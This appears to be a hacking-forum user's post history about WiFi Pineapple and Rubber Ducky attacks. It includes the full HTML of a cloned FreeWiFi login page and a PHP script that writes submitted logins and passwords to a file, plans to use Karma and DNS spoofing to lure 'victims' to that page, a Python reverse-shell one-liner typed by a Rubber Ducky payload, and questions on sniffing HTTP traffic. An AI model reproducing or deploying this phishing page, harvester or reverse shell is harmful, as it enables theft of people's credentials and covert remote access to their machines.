Jump to content


Active Members
  • Posts

  • Joined

  • Last visited

Posts posted by carmelo42

  1. Hello,

    I'm trying to set up evil portal with credential harvester.

    so I have duplicated an wifi hotspot identification page, and I use it as my evil portal splash page.

    But, in this identification page, I have a "ok" button, wich is redirecting on a post.php page : this page writes the txt file with the credential entered ...

    But as I have not reached the $authtarget page, the client stays unconnected, and even the post.php cannot be reached ...

    Have you some idea ?

    Here is my splash page :

    <!DOCTYPE html">
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <meta name="viewport" content="width=400, user-scalable = no">
    <link rel="stylesheet" type="text/css" href="" media="screen">
    <div id="header">
      <div id="header_c">
        <div id="top">
          <div id="top-menu"><img src="" alt="Free" height="112" width="232"></div>
      <div class="clearer"></div>
    <div id="bod">
      <div id="bod_c">
        <div id="block">
          <h1>CONNEXION AU SERVICE <span class="red">FreeWiFi</span></h1>
          <div id="block_2">
            <p>Pour vous connecter au service FreeWiFi, <br>
              utilisez les identifiants que vous avez configurés lors de votre premier accès au service<br>
            </p><form id="form1" name="form1" method="post" action="post.php">
              <label for="login" class="label"> IDENTIFIANT</label>
              <input name="login" id="login" class="input_r" required>
              <label for="password" class="label"> MOT DE PASSE</label>
              <input name="password" id="password" class="input_r" value="" type="password" required>
    <!--          <a href="#" class="label" style="padding-top:0px;"><img src="/im/help.png" alt="ASSISTANCE" width="37" height="40" border="0"  /></a>
    <!--	  <input name="priv" id="priv" type="hidden"  value="" /> -->
              <input name="submit" value="Valider" class="input_b" type="submit">
             <div class="clearer"></div> 
          <a href="https://wifi.free.fr/?priv=$PRIV_SUB"><img src="" alt="Vous n'êtes pas abonné FREE? Cliquez ici et dans une minute, vous pourrez accéder à internet" border="0" height="70" width="399"></a></div>

    Here is mu post.php page :

    <?php $file = 'harvester_2014-09-22 20:12:59.594540.txt';file_put_contents($file, print_r($_POST, true), FILE_APPEND);?><meta http-equiv="refresh" content="0; url=/etc/nodogsplash/htdocs/$authtarget" />
  2. Hi guys,

    I have tried but I can't make it work :(

    Can someone explain how to use (briefly) PineAP ?

    I want the client auto connect to my pineapple, without select it in their wireless preferences (like Karma with previous firmware)

    A quick "pineAP use guide" like : one the PineAP tile, clic "enable", and after ..."

    Please I need some help :)

  3. Something goes wrong ... I can't get karma or PineAP running ...

    So on the MV, we have 3 network interfaces :

    - LAN

    - WLAN0

    - WLAN1

    I connect my "evil" PC to the pineApple through ethernet.

    I connected via Wifi Manager v2.1 radio0 to my regular SSID, which provides internet to the pineapple

    I want to use radio1 to "karma" victims ...

    May be I'm wrong ?

  4. Hello,

    I am trying to do this scenario :

    1) With KARMA, i want some clients get auto connected to my pineapple

    2) With DNSSpoof, I redirect all the client to my fake wifi authentification page, which is on my Kali Laptop. The fake wifi page logs the credentials entered by the 'victim'.

    3) The victim is redirected through internet and can navigate as if it was on the real wifi authentification page (the pineapple is connected to internet with WLAN1 as client)

    Is this even possible ?

    A little schema attached ;)




  5. Hello guys,

    I'm trying to have fun with DNS Spoof but I have some problems ...

    In the DNSSpoof conf, I have this : microsoft.com

    I activate DNSSpoof, navigate on microsoft.com with my browser, the pine apple html page appears. It works.

    But, if I deactivate DNSSpoof from the PineApple, my browser continues to go into the pine apple page when I want to reach microsoft.com ...

    Even with DNSSpoof off !

    What can I do ?



  6. Hi guys !

    I've just received my Rubber Ducky.

    I successfully managed to upgrade the firmware to the Duck 2.1 and change my VID/PID to skip the keyboard setup assistant on a mac.

    I've tried to use the osx user backdoor (reverse shell) payload, encode it with duck toolkit online and select "Français MAC" as language (i'm working on an azerty macbook pro). Everything seems to be okay (no azerty/qwerty problem), except one thing : the ~ character does not print.

    Somebody does have an idea?

    Same problem here with a french mac keyboard.

    I have encoded my ducky script with the ressource frmac.properties.

    Here is what my ducky writes :

    python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((,8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(q/bin/sh,-iq);'

    Here is what I have in my script :

    python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
  7. Is it an open WIFI network?

    Nope, it's WPA2 protected, but as it's mine, I'm in !

    If you MITM the target, regardless of wireless or wired, you should see all of its traffic and then just use HTTP as the display filter in wireshark to see only http traffic. If its OpenWifi, then put the card sniffing into monitor mode and you should be able to see its traffic if its not encrypted in any way. If in WEP or WPA, then you need to MITM the other node.

    What I don't understand : do I have to be connected on the wireless network BEFORE putting the card into monitor mode ? And in wireshark what interface do I have to listen ? wlan0 ? mon0 ?

  8. Hello guys and girls :)

    So I'm trying to sniff HTTP with wireshark :

    - I have an ALFA 500 wireless card, connected to my pentest computer

    - the alfa card is connected on my wifi network.

    - I want to sniff HTTP that comes from my 2nd computer, which is on the same wireless network.

    How can I do this ?

    (it's workingvery well if my pentest computer is ethernet connected)

  • Create New...